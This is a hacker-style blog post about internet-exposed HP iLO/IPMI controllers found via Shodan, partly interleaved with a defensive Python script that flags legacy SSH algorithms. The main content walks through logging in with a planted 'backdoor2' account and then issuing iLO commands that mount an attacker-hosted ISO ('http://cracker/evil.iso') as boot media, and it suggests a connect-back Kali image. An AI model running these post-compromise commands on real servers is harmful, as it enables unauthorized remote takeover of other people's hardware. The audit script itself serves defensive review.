Tuesday, February 18, 2025

IPMI exposure over the internet, IPMIPWN & post-compromise activities.


Another stop along memory lane is my favorite thing to boast about, IPMIPWN! :P

I thought I would dive back into Shodan and check out the status of the attack surface after all this time. As expected, still stocked with targets! So this time around I wanted to take a look beyond penetration and look at post-compromise activity.

It's been a while since I first made IPMIPWN, so a few things have changed. The servers out there are so old that the ciphers they use for SSH are no longer supported by modern desktop SSH clients by default, so my first SSH attempt post IPMIPWN hax0rin went much like the below:
ssh backdoor2@target.com
Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Google said to add -o KexAlgorithms=diffie-hellman-group14-sha1. Then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com

Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com

Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com

Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1 

And then:

C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com

The authenticity of host 'target.com' can't be established.
DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'target.com' (DSA) to the list of known hosts.
backdoor2@target.com's password:

User:backdoor2 logged-in to ILOBRC444.(target.com)
iLO 3 Standard 1.26 at  Aug 26 2011
Server Name: SER_EPAPAR
Server Power: On
</>hpiLO->
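As an added, defender-side example that is not from the original post: the four "Unable to negotiate" errors above are exactly the evidence an auditor wants when inventorying what a management interface still offers. The Python below parses those lines (the sample input is constructed here from the post's output) and reports which offered algorithms are legacy and why.

```python
import re

# Constructed sample: the four "Unable to negotiate" lines quoted in the post above.
SAMPLE_ERRORS = """\
Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss
Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc
Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1
"""

LINE_RE = re.compile(
    r"Unable to negotiate with (?P<host>\S+) port (?P<port>\d+): no matching "
    r"(?P<kind>key exchange method|host key type|cipher|MAC) found\. Their offer: (?P<offer>\S+)"
)

# (kind, predicate, reason): why an offered algorithm counts as legacy; first matching rule wins.
WEAK_RULES = [
    ("key exchange method", lambda a: a == "diffie-hellman-group1-sha1", "1024-bit DH group (Logjam-class)"),
    ("key exchange method", lambda a: a.endswith("-sha1"), "SHA-1 based key exchange"),
    ("host key type", lambda a: a == "ssh-dss", "1024-bit DSA host key"),
    ("cipher", lambda a: a.startswith("3des"), "64-bit block cipher (Sweet32)"),
    ("cipher", lambda a: a.endswith("-cbc"), "CBC mode (plaintext-recovery attacks)"),
    ("MAC", lambda a: a in ("hmac-sha1", "hmac-md5", "hmac-sha1-96", "hmac-md5-96"), "SHA-1/MD5 based MAC"),
]

def parse_offers(text):
    """Map each negotiation kind to the list of algorithms the server offered."""
    offers = {}
    for m in (LINE_RE.search(line) for line in text.splitlines()):
        if m:
            offers.setdefault(m.group("kind"), []).extend(m.group("offer").split(","))
    return offers

def audit(offers):
    """Return {(kind, algorithm): reason} for every legacy algorithm in the offers."""
    findings = {}
    for kind, algs in offers.items():
        for alg in algs:
            reason = next((r for k, pred, r in WEAK_RULES if k == kind and pred(alg)), None)
            if reason:
                findings[(kind, alg)] = reason
    return findings

if __name__ == "__main__":
    for (kind, alg), reason in sorted(audit(parse_offers(SAMPLE_ERRORS)).items()):
        print(f"{kind:20} {alg:30} {reason}")
```

Feeding it the real output of a scan against your own BMC fleet gives a per-host list of what to retire, and an empty result is the state a patched or network-isolated iLO should be in.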

 

Ok, so IPMIPWN got us this far; what next? A few possible attack paths might involve the virtual media (VM) functionality. Here is how that might be set up:

First, see what VM is loaded, if any:

</>hpiLO-> show map1/oemhp_vm1/cddr1

Set our own VM:

</>hpiLO-> cd map1/oemhp_vm1/cddr1

</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso

Enable our "attacker-controlled" VM:

</>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect

Confirm our changes:

</map1/oemhp_vm1/cddr1>hpiLO-> show

I used webhook.site to confirm this attack with great success: as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, which runs on boot or on network connection confirmation. More attack paths later >:)


Enjoy the 1's and 0's.. 
